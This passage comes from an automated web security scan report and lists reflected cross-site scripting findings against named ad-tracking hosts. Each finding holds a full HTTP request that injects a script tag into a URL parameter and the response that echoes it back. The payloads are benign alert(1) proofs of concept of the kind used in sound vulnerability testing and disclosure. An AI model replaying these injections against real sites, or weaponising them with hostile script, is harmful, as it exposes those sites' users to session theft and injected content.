if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"31476441a8b2<script>alert(1)</script>16a0b4321e1", c15:"", c16:"", r:""});

1.89. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 7aa03<script>alert(1)</script>33d2ba5508b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=3147644&c15=7aa03<script>alert(1)</script>33d2ba5508b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"3147644", c15:"7aa03<script>alert(1)</script>33d2ba5508b", c16:"", r:""});

1.90. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload efa2b<script>alert(1)</script>b32d71508fc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338efa2b<script>alert(1)</script>b32d71508fc&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338efa2b<script>alert(1)</script>b32d71508fc", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.91. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2bc3f<script>alert(1)</script>8a89c7c3d07 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!2bc3f<script>alert(1)</script>8a89c7c3d07&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!2bc3f<script>alert(1)</script>8a89c7c3d07", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.92. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ecbe3<script>alert(1)</script>19cfb851d89 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!ecbe3<script>alert(1)</script>19cfb851d89&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!ecbe3<script>alert(1)</script>19cfb851d89", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.93. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload d5698<script>alert(1)</script>41ad9abe9a7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644d5698<script>alert(1)</script>41ad9abe9a7&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
score;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644d5698<script>alert(1)</script>41ad9abe9a7", c6:"", c10:"", c15:"", c16:"", r:""});

1.94. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload cd70e<script>alert(1)</script>b6f76d922d1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=cd70e<script>alert(1)</script>b6f76d922d1& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:38 GMT
Date: Mon, 14 Feb 2011 01:26:38 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"cd70e<script>alert(1)</script>b6f76d922d1", c10:"", c15:"", c16:"", r:""});

1.95. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37cdc"><script>alert(1)</script>42f29418bd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/115666934/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.96. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e176c"><script>alert(1)</script>ba946806cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/440039318/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.97. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12411"><script>alert(1)</script>948b5d9dd28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/1632556584/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.98. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b804e"><script>alert(1)</script>4cb874026ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/844783005/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.99. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168c3"><script>alert(1)</script>e6ff1b42792 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/303112085/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.100. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f787"><script>alert(1)</script>32af85f766d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x904f787"><script>alert(1)</script>32af85f766d HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/2008971942/x904f787"><script>alert(1)</script>32af85f766d/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

